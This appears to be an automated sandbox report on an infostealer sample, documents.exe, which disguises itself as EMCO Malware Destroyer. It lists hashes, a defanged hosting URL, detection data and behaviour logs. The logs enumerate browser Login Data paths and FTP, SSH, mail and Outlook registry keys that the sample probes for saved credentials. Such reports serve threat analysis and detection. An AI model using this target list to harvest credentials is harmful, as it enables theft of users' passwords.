MalScore
100/100
MalFamily
Ispy

documents.exe

File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 217.50 KB (222720 bytes)
Compile time: 2017-08-28 16:13:41
MD5: 3df3dbadd76ff60df853b632d164a7b6
SHA1: f68c88259de07926ecf5a17fc070803f33663525
SHA256: fd616bf7430ee542086357867883ac8694ad389989ca710b162d5ac3a69dc30a
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-08-31 05:36:04
Last submission: 2018-08-31 05:36:04
Filename detected: - documents.exe (1)
URL file hosting
hXXp://sstvalve.com/administrator/documents.exe
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-08-21 23:49:54 [52/68] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x323a4 205824 5d13c452809de3720d4b18ef4b4d7b2c af37668c137e9858930a2dd3a06fac3f582d7bb5
.rsrc 0x36000 0x3d4a 15872 b305c4fcc522165cdf32f79ffff73510 f425596a1249761995357741cb663a01cd851c66
.reloc 0x3a000 0xc 512 71a6aa2c8551fa9f615db9282c80a5ee 7c622270bca387a685cb56abdeffeb442b786d1b
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x37208 9640 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x397b0 34 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x397d4 908 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_MANIFEST 0x39b60 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Emco Software
Assembly Version: 7.9.16.1045
InternalName: MalwareDestroyer.exe
FileVersion: 7.9.16.1045
CompanyName: Emco Software
LegalTrademarks: Emco Software
ProductName: MalwareDestroyer
ProductVersion: 7.9.16.1045
FileDescription: EMCO Malware Destroyer
Translation: 0x0000 0x04b0
OriginalFilename: MalwareDestroyer.exe
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-08-31 05:29:55 2018-08-31 05:32:55 180

19 Behaviors detected by system signatures

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\documents.exe.config
C:\Users\Seven01\AppData\Local\Temp\documents.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\documents.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\documents.config
C:\Users\Seven01\AppData\Local\Temp\documents.INI
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol28.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\uxtheme.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources\QTFC.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources\QTFC.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\Seven01\AppData\Local\Temp\shell32.dll
C:\ProgramData\Microsoft\Windows\Start Menu\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2688.7335343
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2688.7335343
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2688.7335500
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data

Read Files


Write Files

C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe

Delete Files

C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2688.7335343
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2688.7335343
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2688.7335500
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Local\Temp\documents.exe

Keys

HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1a160f57\60438131
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\documents.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\E115DF6A
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x9c\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x92\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
